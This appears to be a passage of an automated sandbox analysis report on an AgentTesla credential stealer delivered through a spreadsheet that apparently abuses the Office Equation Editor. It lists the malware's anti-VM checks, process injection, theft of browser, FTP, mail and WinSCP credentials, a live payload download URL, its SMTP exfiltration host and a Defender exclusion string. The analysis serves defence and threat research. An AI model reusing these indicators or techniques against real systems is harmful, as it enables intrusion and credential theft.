                    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: ORDER 9387383900.xlsxInitial sample: OLE indicators vbamacros = False
                    Source: ORDER 9387383900.xlsxInitial sample: OLE indicators encrypted = True
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00218397 push ebp; iretd
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021D7BC push edx; retf
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_003522ED pushfd ; ret
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_003530C0 pushfd ; retf
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.78593990731
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.78593990731
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                    Boot Survival:

                    barindex
                    Drops PE files to the user root directoryShow sources
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: ORDER 9387383900.xlsxStream path 'EncryptedPackage' entropy: 7.99934422624 (max. 8.0)

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM3Show sources
                    Source: Yara matchFile source: 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9145
                    Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 600
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260Thread sleep time: -240000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 2892Thread sleep time: -100778s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 1616Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 1900Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 1192Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 1192Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 1840Thread sleep count: 9145 > 30
                    Source: C:\Users\Public\vbc.exe TID: 1840Thread sleep count: 600 > 30
                    Source: C:\Users\Public\vbc.exe TID: 1192Thread sleep count: 92 > 30
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 100778
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: VMWARE
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                    Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                    Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                    Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                    Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmpBinary or memory string: !Progman
                    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
                    Source: Yara matchFile source: 4.2.vbc.exe.387bed0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.387bed0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.3662578.5.raw.unpack, type: UNPACKEDPE
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Tries to harvest and steal ftp login credentialsShow sources
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
                    Source: Yara matchFile source: 4.2.vbc.exe.387bed0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.387bed0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.3662578.5.raw.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information31Security Account ManagerSecurity Software Discovery211SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 385366 Sample: ORDER 9387383900.xlsx Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->31 33 Found malware configuration 2->33 35 Antivirus detection for URL or domain 2->35 37 12 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 173 31 2->12         started        process3 dnsIp4 29 198.23.213.61, 49165, 80 AS-COLOCROSSINGUS United States 7->29 21 C:\Users\user\AppData\Local\...\rrr[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 1 5 7->14         started        25 C:\Users\user\...\~$ORDER 9387383900.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->49 51 Machine Learning detection for dropped file 14->51 53 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->53 55 Injects a PE file into a foreign processes 14->55 17 vbc.exe 2 14->17         started        process9 dnsIp10 27 us2.smtp.mailhostbox.com 208.91.199.225, 49166, 587 PUBLIC-DOMAIN-REGISTRYUS United States 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    ORDER 9387383900.xlsx33%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe100%Joe Sandbox ML
                    C:\Users\Public\vbc.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    5.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://bfdUomDwe8FRPCAbrg.com0%Avira URL Cloudsafe
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    http://htJAdA.com0%Avira URL Cloudsafe
                    http://198.23.213.61/rrr.exe100%Avira URL Cloudmalware
                    https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    208.91.199.225
                    truefalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://198.23.213.61/rrr.exetrue
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://bfdUomDwe8FRPCAbrg.comvbc.exe, 00000005.00000002.2345994356.000000000255A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2346039166.00000000025A9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmpfalse
                        high
                        http://us2.smtp.mailhostbox.comvbc.exe, 00000005.00000002.2346025048.0000000002598000.00000004.00000001.sdmpfalse
                          high
                          http://www.day.com/dam/1.0F3AA532.emf.0.drfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://htJAdA.comvbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://www.%s.comPAvbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2152952419.00000000025C1000.00000004.00000001.sdmpfalse
                              high
                              https://api.ipify.org%vbc.exe, 00000005.00000002.2345938081.00000000024DA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpfalse
                                high

